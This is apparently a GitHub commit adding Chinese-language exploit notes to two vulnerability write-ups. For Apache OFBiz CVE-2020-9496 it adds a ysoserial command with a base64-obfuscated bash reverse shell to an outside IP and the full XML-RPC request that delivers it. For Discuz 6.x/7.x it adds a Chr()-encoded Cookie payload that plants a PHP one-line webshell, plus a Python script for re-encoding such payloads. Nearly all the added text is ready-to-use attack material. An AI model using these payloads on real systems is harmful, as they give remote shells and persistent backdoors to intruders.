更新漏洞

h8sd · Dec 26, 2022 · 1c5d8a5 · 1c5d8a5
1 parent c99a532
commit 1c5d8a5
Show file tree

Hide file tree

Showing 2 changed files with 75 additions and 2 deletions.
diff --git a/Apache OfBiz 反序列化命令执行漏洞 CVE-2020-9496.md b/Apache OfBiz 反序列化命令执行漏洞 CVE-2020-9496.md
@@ -70,3 +70,44 @@ Content-Length: 4093
 
 ![image-20220228134307506](./images/202202281343563.png)
 
+### 反弹shell
+
+要进行两遍base64编码：
+
+```
+java -jar ysoserial.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
+```
+
+发送数据包，在VPS上监听反弹shell：
+
+```
+POST /webtools/control/xmlrpc HTTP/1.1
+Host: 172.16.10.22:8443
+Cookie: OFBiz.Visitor=10103
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Connection: close
+Content-Length: 2401
+
+<?xml version="1.0"?>
+<methodCall>
+  <methodName>ProjectDiscovery</methodName>
+  <params>
+    <param>
+      <value>
+        <struct>
+          <member>
+            <name>test</name>
+            <value>
+              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[Base64 Payload Here]</serializable>
+            </value>
+          </member>
+        </struct>
+      </value>
+    </param>
+  </params>
+</methodCall>
+```
+
diff --git a/Discuz 7.x6.x 全局变量防御绕过导致代码执行.md b/Discuz 7.x6.x 全局变量防御绕过导致代码执行.md
@@ -39,7 +39,39 @@ Connection: close
 
 ![image-20220222112923996](./images/202202221129105.png)
 
-使用蚁剑连接，构造Webshell![image-20220222130454953](./images/202202221304008.png)
+同样方法传入以下Cookie写入一句话木马文件，文件为x.php，密码为pwd
 
-设置HTTP Headers中的Cookie字段，将一句话木马写入![image-20220222130429384](./images/202202221304489.png)
+```
+Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))
+```
+
+ASCII码和字符互相转换的小脚本，方便修改POC的文件名和密码：
+
+```
+import re
+# ASCII = ord(Word)
+# Word = chr(ASCII)
+
+# ASCII -> Word
+def ASCII2word(ASCIIs):
+	for c in re.findall(r"(\d+)", ASCIIs):
+	    print(chr(int(c)),end="")
+
+# Word -> ASCII
+def word2ASCII(words):
+	ASCIIs = ""
+	for word in words:
+		ASCIIs += "Chr(" + str(ord(word)) + ")."
+	print(ASCIIs)
+
+print("----------ASCII TO WORD---------------------")
+
+asciis = "Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(109).Chr(105).Chr(115).Chr(104).Chr(105).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(101).Chr(115).Chr(116).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)"
+ASCII2word(asciis)
+
+print("\n\n----------WORD TO ASCII--------------------")
+
+words = "fputs(fopen('x.php','w'),'<?php @eval($_POST[pwd])?>');"
+word2ASCII(words)
+```